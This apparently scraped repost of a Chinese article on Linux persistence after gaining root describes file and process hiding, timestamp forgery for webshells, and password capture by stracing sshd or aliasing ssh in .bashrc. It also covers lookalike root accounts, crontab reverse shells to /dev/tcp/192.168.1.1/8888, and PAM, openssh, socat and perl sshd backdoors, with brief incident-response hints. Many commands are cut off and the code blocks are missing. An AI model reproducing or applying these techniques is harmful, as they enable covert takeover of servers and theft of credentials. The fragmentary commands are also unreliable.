| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 系统运维 -> Linux权限维持-隐藏、后门及排查思路 -> 正文阅读 |
|
[系统运维]Linux权限维持-隐藏、后门及排查思路 |
文章目录隐藏篇一、隐藏文件、时间戳ls -al 比如参考 index.php 的时间,再赋给 webshell.php,结果两个文件的时间就一样了。 利用方法 touch -r index.php webshell.php 二、隐藏权限
三、隐藏历史操作命令四、端口复用第一种方式:通过SSLH在同一端口上共享SSH与HTTPS 第二种方式:利用IPTables进行端口复用 #开启复用 五、进程隐藏1.系统函数劫持,so劫持 libprocesshider工具 利用 LD_PRELOAD 来实现系统函数的劫持,实现如下
2.第二种方法:进程注入工具linux-inject linux-inject是用于将共享对象注入Linux进程的工具 github项目地址: 可以从proc 虚拟文件系统里面 查看maps,内存里加载里哪些动态库 后门篇一、抓取敏感信息1、本地测试抓取密码第一种方式:strace命令 在获取到目标ROOT权限后,可以直接在终端执行如下命令,该命令会监听sshd进程,并将登录过程及信息记录到/tmp/sshd.log文件中。
tmp目录其实不是很安全 终极方法 在管理员喝多了或者脑子转不过来的情况下,是绝对不会发现的!至少我用了这么久是没几个发现的。 是文件的话浏览器访问直接输 … 就行,目录同理。 touch … 创建名字为 … 的文件 mkdir … 创建名字为 … 的文件夹 筛选密码 grep -E ‘read(6, “.+\0\0\0\.+”’ /tmp/sshd.log 第二种 首先编辑bashrc文件, vi ~/.bashrc[当前用户] 或者vi /etc/bashrc[所有用户]然后将如下命令加入文件当中并保存,注意strace权限问题。 alias ssh=‘strace -o /tmp/sshpwd- 二、添加新用户排查特权用户(uid=0)、可远程登录用户和 sudo用户 名字和已有的相似一点! useradd systemd-coredumpp; 一句话 添加
三、crontab计划任务反弹shellcrontab -e echo “*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.1.1/8888 0>&1” >/var/spool/cron/123 (crontab -l;printf "*/5 * * * * exec9<> /dev/tcp/localhost/8080&&exec0<&9&&exec1>&92>&1&&/bin/bash --noprofile –I;rno crontab for
四、SUIDSuid shell是一种可用于以拥有者权限运行的shell。 五、SSH相关1、ssh公私钥免密登陆在客户端上生成一对公私钥,然后把公钥放到服务器上(~/.ssh/authorized_keys),保留私钥。当ssh登录时,ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。 排查技巧:查看 ssh-keygen生成密钥, 在服务器上留下公钥,改名为 authorized_keys 私钥修改权限 chmod 600 id_rsa. 注意修改权限 chmod 600 ~/.ssh/authorized_keys ssh -i id_rsa root@ip 2、软连接在sshd服务配置运行PAM认证的前提下,PAM配置文件中控制标志为sufficient时只要pam_rootok模块检测uid为0即root权限即可成功认证登陆。通过软连接的方式,实质上PAM认证是通过软连接的文件名 在目标服务器上执行一句话后门:
执行完之后,任何一台机器 排查: 进程、端口都可以发现异常, kill -s 9 PID 结束进程即可 3、PAM后门https://blog.csdn.net/weixin_40412037/article/details/118728788 pam_unix.so 这个文件进行重新编译 做身份认证的 Resource used : http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html Here is a GitHub repository containing a script automating this process of creating a backdoor: https://github.com/zephrax/linux-pam-backdoor 4、ssh wrapper给sshd中加入一段代码,判断连接来源端口,将恶意端口来源访问传输内容重定向到/bin/sh中。 socat STDIO TCP4:10.18.180.20:22,sourceport=13377 优点: 1、在无连接后门的情况下,管理员是看不到端口和进程的,last也查不到登陆。 2、在针对边界设备出网,内网linux服务器未出网的情况下,留这个后门可以随时管理内网linux服务器,还不会留下文件和恶意网络连接记录。 5、openssh后门https://www.jianshu.com/p/c1cd73b072f1 加入后门文件后,重新编译,替换原有的openssh 备份原有文件, 后期进行时间修改,防止被查到 修复方案与应急响应 1)重装openssh软件2)SSH禁止对外开放 应急响应: 1)比对ssh的版本ssh -V 2)查看ssh配置文件和/usr/sbin/sshd的时间stat /usr/sbin/sshd 3)strings检查/usr/sbin/sshd,看是否有邮箱信息strings可以查看二进制文件中的字符串,在应急响应中是十分有用的。有些sshd后门会通过邮件发送登录信息,通过strings /usr/sbin/sshd可以查看到邮箱信息。 4)通过strace监控sshd进程读写文件的操作一般的sshd后门都会将账户密码记录到文件,可以通过strace进程跟踪到ssh登录密码文件。 6、perl脚本SSH后门这个ssh 后门伪装成一个perl脚本,名为sshd,位于/usr/sbin/sshd , 将系统原先的sshd 移到/usr/bin下
含义: 第二行 启动sshd (/usr/bin/sshd是真正的sshd)服务 ,凡是传递给/usr/sbin/sshd (后门)的参数都传递给真正的sshd (这一行保证了普通用户也可以正常使用ssh 服务,登录并不会有什么异常现象 六、vim后门https://wxiaoge.blog.csdn.net/article/details/119379149 七、strace 后门
八、.bashrc 启动脚本后门 登陆的时候反弹shell九、语言脚本类后门先找web目录,然后看看脚本类型 一般/var/www/html php最好加到已有的文件中,并且加到文件中间 Apache mod_rootme十、rootkit、bootkit十一、LD_PRELOAD参考资料https://blog.csdn.net/qq_33020901/article/details/81773737 https://blog.csdn.net/weixin_42282189/article/details/121004208 https://blog.csdn.net/nzjdsds/article/details/82954456 https://blog.csdn.net/qq_33020901/article/details/81773737 https://www.freebuf.com/articles/system/259494.html https://airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c https://blog.csdn.net/weixin_40412037/article/details/117447832 |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/15 15:03:31- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |